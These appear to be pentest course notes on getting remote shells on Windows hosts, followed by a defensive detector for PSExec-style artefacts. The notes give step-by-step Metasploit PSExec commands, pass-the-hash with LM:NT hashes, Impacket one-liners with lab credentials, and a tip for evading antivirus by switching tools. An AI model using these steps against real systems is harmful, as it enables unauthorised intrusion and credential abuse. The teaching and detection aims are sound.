Gaining Shells on Remote Machines in Network Penetration Testing
Gaining Shells on Remote Machines
Overview of Techniques
- Recap: earlier sections covered capturing hashes, cracking passwords, and dumping SAM (Security Account Manager) hashes through relay attacks.
- Objective: gain a shell on remote machines using several methods.
Methods to Gain Shells
- Using Metasploit with the PSExec module
  - PSExec allows remote execution of commands on Windows systems over SMB.
  - Required options for the module:
    - RHOSTS: the remote host.
    - SMBDomain: domain of the target system.
    - SMBUser: username for authentication.
    - SMBPass: password, or LM:NT hash, for authentication.
  - Steps to execute the PSExec module:
    1. Launch Metasploit with the msfconsole command.
    2. Search for the module: search psexec.
    3. Select the exploit: use exploit/windows/smb/psexec.
    4. Verify that the default payload is Windows Meterpreter reverse TCP.
    5. For 64-bit targets, change the payload: set payload windows/x64/meterpreter/reverse_tcp.
    6. Set the required options:
       - set RHOSTS [target IP]
       - set SMBDomain [domain]
       - set SMBUser [username]
       - set SMBPass [password]
    7. Run the exploit with the run command.
    8. Once a shell is obtained, the session can be backgrounded with the background command.
- Alternative: using hashes instead of passwords
  - If a hash was obtained from a SAM dump, it can be passed directly for authentication without the original password.
  - Considerations:
    - Hashes do not need to be cracked to be leveraged.
    - Domain compromise often does not require a shell; sensitive data can be gathered and attacks conducted without one.
Lab Walkthrough
- Initial setup:
  1. Start Metasploit: msfconsole.
  2. Search for the PSExec module: search psexec.
  3. Choose the appropriate exploit: use exploit/windows/smb/psexec (option 4 in the example).
  4. Change the default payload: set payload windows/x64/meterpreter/reverse_tcp.
  5. Configure the target machine by setting the following parameters:
     - set RHOSTS 192.168.138.137
     - set SMBDomain marvel.local
     - set SMBUser fcastle
     - set SMBPass password1
  6. Review the configuration with the options command.
  7. Execute the exploit with the run command to obtain a shell.
Backgrounding Sessions
- Use the background command to keep the session accessible while exploring other targets.
- Manage multiple sessions with the sessions command to list and switch between shells.
- Setting the session to use an NTLM hash for authentication:
  - Switch the parameters to the local administrator account:
    - set SMBUser administrator
    - Unset the domain: unset SMBDomain.
    - Set SMBPass directly to the NTLM hash.
    - The hash must be copied correctly, in LM:NT form (both parts, separated by a colon).
  - Execute the attack:
    - Run the module again with the hash to gain access without knowing the original password.
Alternative Shell Acquisition Methods
- Using psexec.py (Impacket):
  - Use the Python script directly to achieve the same result:
    - Command structure: psexec.py marvel.local/fcastle:password1@192.168.138.137
    - Provides an immediate shell without needing Metasploit.
- Using alternative tools when necessary:
  - If psexec fails (e.g., because antivirus blocks it), try other tools:
    - wmiexec.py: executes commands through Windows Management Instrumentation.
    - smbexec.py: another script for executing commands over SMB.
  - All of these methods serve the same goal: obtaining shells on machines, subject to their configuration and access controls.
Key Considerations
- Gaining a shell is not always essential for compromising a domain.
- Techniques vary between environments, and tooling must adapt to changing security measures.
- Remain aware of security alerts and detection mechanisms during operations.
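The PSExec-family tools above leave recognisable artefacts in Windows event logs: a service installed on the target (System event 7045) whose binary or output lives on an admin share, and a type-3 NTLM logon (Security event 4624) that a pass-the-hash run as the local administrator produces. The following detector is an added example, not part of the original notes; the event records are constructed here, modelled on those artefacts (Sysinternals' PSEXESVC, an 8-letter service dropped on ADMIN$, smbexec's default BTOBTO service), and the field names follow the 7045 and 4624 events.

```python
import re

# Constructed sample events (not real telemetry). Field names follow the
# System 7045 "service installed" and Security 4624 "logon" events.
SAMPLE_EVENTS = [
    {"id": 7045, "host": "WS01", "ServiceName": "PSEXESVC",
     "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    {"id": 7045, "host": "WS01", "ServiceName": "mKjpQwXe",
     "ImagePath": r"\\127.0.0.1\ADMIN$\mKjpQwXe.exe"},
    {"id": 7045, "host": "WS01", "ServiceName": "BTOBTO",
     "ImagePath": r"%COMSPEC% /Q /c echo dir ^> \\127.0.0.1\C$\__output 2^>^&1"},
    {"id": 7045, "host": "WS01", "ServiceName": "Spooler",
     "ImagePath": r"%SystemRoot%\System32\spoolsv.exe"},
    {"id": 4624, "host": "WS01", "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "administrator", "TargetDomainName": "WS01",
     "IpAddress": "192.168.138.130"},
    {"id": 4624, "host": "WS01", "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "fcastle", "TargetDomainName": "MARVEL",
     "IpAddress": "192.168.138.130"},
]

ADMIN_SHARE = re.compile(r"\\\\[^\\]+\\(ADMIN|C)\$", re.IGNORECASE)  # \\host\ADMIN$ or \\host\C$
KNOWN_NAMES = {"PSEXESVC", "BTOBTO"}  # Sysinternals PsExec, Impacket smbexec defaults

def service_install_reason(ev):
    """Why a 7045 event looks like remote service execution, else None."""
    name, path = ev.get("ServiceName", ""), ev.get("ImagePath", "")
    if name.upper() in KNOWN_NAMES:
        return f"known lateral-movement service name {name}"
    if ADMIN_SHARE.search(path):
        return "service binary or output routed through an admin share"
    return None

def logon_reason(ev):
    """Flag type-3 NTLM logons with a local account: the shape a pass-the-hash
    psexec against the built-in administrator produces (heuristic, not proof)."""
    if ev.get("LogonType") != 3 or ev.get("AuthenticationPackageName") != "NTLM":
        return None
    if ev.get("TargetDomainName", "").upper() == ev.get("host", "").upper():
        return f"NTLM network logon as local {ev['TargetUserName']} from {ev['IpAddress']}"
    return None

def detect(events):
    """Return (event id, reason) for every event a heuristic matches."""
    checks = {7045: service_install_reason, 4624: logon_reason}
    found = [(ev["id"], checks[ev["id"]](ev)) for ev in events if ev.get("id") in checks]
    return [f for f in found if f[1]]
```

Running detect(SAMPLE_EVENTS) flags the three lateral-movement service installs and the local-administrator NTLM logon while leaving the Spooler install and the Kerberos logon alone; in practice the 7045 and 4624 hits should be correlated by host and time window before raising an alert.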
Conclusion
- Understanding these methods is vital: they provide multiple pathways to access systems, whether with hashed credentials or cleartext passwords, and strengthen pentesting and security-auditing capabilities.
- Knowledge of several attack vectors prepares one for effective assessments and allows flexibility in tool choice.